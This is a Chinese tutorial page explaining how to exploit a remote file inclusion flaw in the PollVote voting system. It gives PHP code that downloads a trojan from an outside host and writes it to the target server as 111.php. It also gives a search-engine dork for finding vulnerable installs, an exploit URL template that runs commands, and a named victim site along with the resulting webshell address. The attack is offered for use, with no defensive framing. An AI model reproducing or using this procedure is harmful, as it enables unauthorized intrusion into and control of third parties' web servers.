手机
当前位置:查字典教程网 >实用技巧 >漏洞研究 >PollVote投票系统漏洞利用
PollVote投票系统漏洞利用
摘要:PollVote是一个投票系统,今天看了非安全的杂志,看了利用方法,不过作者说利用过程的时候很烦琐,关键的时候又没说明白,简单的说一下``首...

PollVote是一个投票系统,今天看了非安全的杂志,看了利用方法,

不过作者说利用过程的时候很烦琐,关键的时候又没说明白,

简单的说一下``

首先建立2个文本分别是creatfile.txt和phpdoor.txt

creatfile.txt内容写

<?

$f=file_get_contents("http://www.hackeroo.com/phpdoor.txt");

$ff=fopen("111.php","a");

fwrite($ff,$f);

fclose($ff);

?>

phpdoor.txt内容就写个PHP木马

之后在http://www.google.com搜索关键词"pollvote.php?pollname"

有很多,

搜索到一个http://www.skinnyturd.co.uk/poll/pollvote.php?pollname=Poll.cfg

就是他了

EXP是http://www.[host].com/[path]/pollvote.php?pollname=http://www.[host].com/CMD.gif?&cmd=ls

这个就是利用原理了,

刚才说到的creatfile.txt和phpdoor.txt这个2个文件都上传到自己的空间里

执行http://www.skinnyturd.co.uk/poll...o.com/creatfile.txt

这样

phpdoor.txt里的内容就会生成一个111.php

这样我们就得到WEBSHELL了

http://www.skinnyturd.co.uk/poll/111.php

【PollVote投票系统漏洞利用】相关文章:

伯乐asp收信程序漏洞及利用程序利用代码

揭露88red生成htm静态页面企业建站系统漏洞第1/2页

从MS03-049漏洞利用看调试系统进程(图)

小议yxbbs漏洞利用代码

Ofsatr 2.6搜索漏洞的简单分析

老兵新传-各种漏洞的利用和一些搜索参数

文件上传漏洞在惠信中的应用

ETP 留言本v1.5爆出漏洞及利用方法

O-blog漏洞暴光

vista输入法漏洞重出江湖

精品推荐
分类导航